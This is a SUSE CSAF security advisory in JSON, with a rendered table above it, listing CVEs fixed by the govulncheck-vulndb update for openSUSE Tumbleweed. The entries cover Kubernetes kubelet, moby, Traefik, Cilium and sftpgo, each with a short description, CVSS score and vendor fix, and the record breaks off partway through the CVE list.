| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
Affected products
Recommended
4 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
References
52 references
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "govulncheck-vulndb-0.0.20241209T183251-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the govulncheck-vulndb-0.0.20241209T183251-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2024-14567",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2024_14567-1.json"
},
{
"category": "self",
"summary": "URL for openSUSE-SU-2024:14567-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/EK3MV2UFLDNRIXIWLVT5CJNSLB2MKFBU/"
},
{
"category": "self",
"summary": "E-Mail link for openSUSE-SU-2024:14567-1",
"url": "https://lists.opensuse.org/archives/list/security-announce@lists.opensuse.org/thread/EK3MV2UFLDNRIXIWLVT5CJNSLB2MKFBU/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-10220 page",
"url": "https://www.suse.com/security/cve/CVE-2024-10220/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-36620 page",
"url": "https://www.suse.com/security/cve/CVE-2024-36620/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-36621 page",
"url": "https://www.suse.com/security/cve/CVE-2024-36621/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-36623 page",
"url": "https://www.suse.com/security/cve/CVE-2024-36623/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-37820 page",
"url": "https://www.suse.com/security/cve/CVE-2024-37820/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-43784 page",
"url": "https://www.suse.com/security/cve/CVE-2024-43784/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-45719 page",
"url": "https://www.suse.com/security/cve/CVE-2024-45719/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-50948 page",
"url": "https://www.suse.com/security/cve/CVE-2024-50948/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52003 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52003/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52529 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52529/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-52801 page",
"url": "https://www.suse.com/security/cve/CVE-2024-52801/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53259 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53259/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53264 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53264/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53858 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53858/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-53862 page",
"url": "https://www.suse.com/security/cve/CVE-2024-53862/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54131 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54131/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-54132 page",
"url": "https://www.suse.com/security/cve/CVE-2024-54132/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-6156 page",
"url": "https://www.suse.com/security/cve/CVE-2024-6156/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-6219 page",
"url": "https://www.suse.com/security/cve/CVE-2024-6219/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-6538 page",
"url": "https://www.suse.com/security/cve/CVE-2024-6538/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2024-8676 page",
"url": "https://www.suse.com/security/cve/CVE-2024-8676/"
}
],
"title": "govulncheck-vulndb-0.0.20241209T183251-1.1 on GA media",
"tracking": {
"current_release_date": "2024-12-11T00:00:00Z",
"generator": {
"date": "2024-12-11T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2024:14567-1",
"initial_release_date": "2024-12-11T00:00:00Z",
"revision_history": [
{
"date": "2024-12-11T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64",
"product": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64",
"product_id": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
},
"product_reference": "govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2024-10220",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-10220"
}
],
"notes": [
{
"category": "general",
"text": "The Kubernetes kubelet component allows arbitrary command execution via specially crafted gitRepo volumes.This issue affects kubelet: through 1.28.11, from 1.29.0 through 1.29.6, from 1.30.0 through 1.30.2.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-10220",
"url": "https://www.suse.com/security/cve/CVE-2024-10220"
},
{
"category": "external",
"summary": "SUSE Bug 1233583 for CVE-2024-10220",
"url": "https://bugzilla.suse.com/1233583"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-10220"
},
{
"cve": "CVE-2024-36620",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-36620"
}
],
"notes": [
{
"category": "general",
"text": "moby v25.0.0 - v26.0.2 is vulnerable to NULL Pointer Dereference via daemon/images/image_history.go.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-36620",
"url": "https://www.suse.com/security/cve/CVE-2024-36620"
},
{
"category": "external",
"summary": "SUSE Bug 1234127 for CVE-2024-36620",
"url": "https://bugzilla.suse.com/1234127"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-36620"
},
{
"cve": "CVE-2024-36621",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-36621"
}
],
"notes": [
{
"category": "general",
"text": "moby v25.0.5 is affected by a Race Condition in builder/builder-next/adapters/snapshot/layer.go. The vulnerability could be used to trigger concurrent builds that call the EnsureLayer function resulting in resource leaks/exhaustion.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-36621",
"url": "https://www.suse.com/security/cve/CVE-2024-36621"
},
{
"category": "external",
"summary": "SUSE Bug 1234131 for CVE-2024-36621",
"url": "https://bugzilla.suse.com/1234131"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-36621"
},
{
"cve": "CVE-2024-36623",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-36623"
}
],
"notes": [
{
"category": "general",
"text": "moby through v25.0.3 has a Race Condition vulnerability in the streamformatter package which can be used to trigger multiple concurrent write operations resulting in data corruption or application crashes.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-36623",
"url": "https://www.suse.com/security/cve/CVE-2024-36623"
},
{
"category": "external",
"summary": "SUSE Bug 1234132 for CVE-2024-36623",
"url": "https://bugzilla.suse.com/1234132"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.1,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-36623"
},
{
"cve": "CVE-2024-37820",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-37820"
}
],
"notes": [
{
"category": "general",
"text": "A nil pointer dereference in PingCAP TiDB v8.2.0-alpha-216-gfe5858b allows attackers to crash the application via expression.inferCollation.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-37820",
"url": "https://www.suse.com/security/cve/CVE-2024-37820"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-37820"
},
{
"cve": "CVE-2024-43784",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-43784"
}
],
"notes": [
{
"category": "general",
"text": "lakeFS is an open-source tool that transforms object storage into a Git-like repository. Existing lakeFS users who have issued credentials to users who have been deleted are affected by this vulnerability. When creating a new user with the same username as a deleted user, that user will inherit all of the previous user\u0027s credentials. This issue has been addressed in release version 1.33.0 and all users are advised to upgrade. The only known workaround for those who cannot upgrade is to not reuse usernames.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-43784",
"url": "https://www.suse.com/security/cve/CVE-2024-43784"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-43784"
},
{
"cve": "CVE-2024-45719",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-45719"
}
],
"notes": [
{
"category": "general",
"text": "Inadequate Encryption Strength vulnerability in Apache Answer.\n\nThis issue affects Apache Answer: through 1.4.0.\n\nThe ids generated using the UUID v1 version are to some extent not secure enough. It can cause the generated token to be predictable.\nUsers are recommended to upgrade to version 1.4.1, which fixes the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-45719",
"url": "https://www.suse.com/security/cve/CVE-2024-45719"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "low"
}
],
"title": "CVE-2024-45719"
},
{
"cve": "CVE-2024-50948",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-50948"
}
],
"notes": [
{
"category": "general",
"text": "An issue in mochiMQTT v2.6.3 allows attackers to cause a Denial of Service (DoS) via a crafted request.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-50948",
"url": "https://www.suse.com/security/cve/CVE-2024-50948"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2024-50948"
},
{
"cve": "CVE-2024-52003",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52003"
}
],
"notes": [
{
"category": "general",
"text": "Traefik (pronounced traffic) is an HTTP reverse proxy and load balancer. There is a vulnerability in Traefik that allows the client to provide the X-Forwarded-Prefix header from an untrusted source. This issue has been addressed in versions 2.11.14 and 3.2.1. Users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52003",
"url": "https://www.suse.com/security/cve/CVE-2024-52003"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52003"
},
{
"cve": "CVE-2024-52529",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52529"
}
],
"notes": [
{
"category": "general",
"text": "Cilium is a networking, observability, and security solution with an eBPF-based dataplane. For users with the following configuration: 1. An allow policy that selects a Layer 3 destination and a port range `AND` 2. A Layer 7 allow policy that selects a specific port within the first policy\u0027s range the Layer 7 enforcement would not occur for the traffic selected by the Layer 7 policy. This issue only affects users who use Cilium\u0027s port range functionality, which was introduced in Cilium v1.16. This issue is patched in PR #35150. This issue affects Cilium v1.16 between v1.16.0 and v1.16.3 inclusive. This issue is patched in Cilium v1.16.4. Users are advised to upgrade. Users with network policies that match the pattern described above can work around the issue by rewriting any policies that use port ranges to individually specify the ports permitted for traffic.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52529",
"url": "https://www.suse.com/security/cve/CVE-2024-52529"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52529"
},
{
"cve": "CVE-2024-52801",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-52801"
}
],
"notes": [
{
"category": "general",
"text": "sftpgo is a full-featured and highly configurable event-driven file transfer solution. Server protocols: SFTP, HTTP/S, FTP/S, WebDAV. The OpenID Connect implementation allows authenticated users to brute force session cookies and thereby gain access to other users\u0027 data, since the cookies are generated predictably using the xid library and are therefore unique but not cryptographically secure. This issue was fixed in version v2.6.4, where cookies are opaque and cryptographically secure strings. All users are advised to upgrade. There are no known workarounds for this vulnerability.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2024-52801",
"url": "https://www.suse.com/security/cve/CVE-2024-52801"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.aarch64",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.ppc64le",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.s390x",
"openSUSE Tumbleweed:govulncheck-vulndb-0.0.20241209T183251-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2024-12-11T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2024-52801"
},
{
"cve": "CVE-2024-53259",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2024-53259"
}
],
"notes": [
{
"category": "general",
